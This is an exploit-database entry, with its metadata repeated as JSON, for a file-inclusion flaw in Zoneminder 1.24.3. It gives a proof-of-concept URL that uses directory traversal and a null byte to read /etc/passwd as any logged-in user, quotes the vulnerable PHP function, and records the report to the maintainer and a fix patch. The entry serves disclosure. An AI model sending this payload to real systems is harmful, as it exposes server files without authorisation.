ID 1337DAY-ID-16586 Type zdt Reporter iye Modified 2011-08-01T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04
You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.
POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00
Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt
Vulnerable Code:
/var/www/zm/includes/functions.php
--------------------------------------------------------
function getSkinFile( $file )
{
global $skinBase;
$skinFile = false;
foreach ( $skinBase as $skin )
{
$tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
if ( file_exists( $tempSkinFile ) )
$skinFile = $tempSkinFile;
}
return( $skinFile );
}
--------------------------------------------------------
# 0day.today [2018-02-13] #
{"published": "2011-08-01T00:00:00", "id": "1337DAY-ID-16586", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-02-14T00:34:04", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/ARKEIA/TYPE77", "MSF:EXPLOIT/WINDOWS/LICENSE/CALICCLNT_GETCONFIG", "MSF:EXPLOIT/WINDOWS/BROWSER/REALPLAYER_SMIL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16586"]}], "modified": "2018-02-14T00:34:04", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-02-14T00:34:04", "edition": 2, "title": "Zoneminder 1.24.3 Remote File Inclusion Vulnerability", "href": "https://0day.today/exploit/description/16586", "modified": "2011-08-01T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/16586", "references": [], "reporter": "iye", "sourceData": "# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability\r\n# Author: Iye (iye[dot]cba-at-gmail[dot]com)\r\n# Software Link: http://www.zoneminder.com/\r\n# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested\r\n# Tested on: Ubuntu 10.04\r\n \r\nYou must be authenticated as a user in the Web App to exploit it. It's\r\nnot a must to be admin.\r\n \r\nPOC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\nReported to proyect mantainer (Philip Coombes) on 2011-07-22\r\nFix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt\r\n \r\nVulnerable Code:\r\n \r\n/var/www/zm/includes/functions.php\r\n--------------------------------------------------------\r\n \r\nfunction getSkinFile( $file )\r\n{\r\n global $skinBase;\r\n $skinFile = false;\r\n foreach ( $skinBase as $skin )\r\n {\r\n $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;\r\n if ( file_exists( $tempSkinFile ) )\r\n $skinFile = $tempSkinFile;\r\n }\r\n return( $skinFile );\r\n}\r\n \r\n--------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-02-13] #"}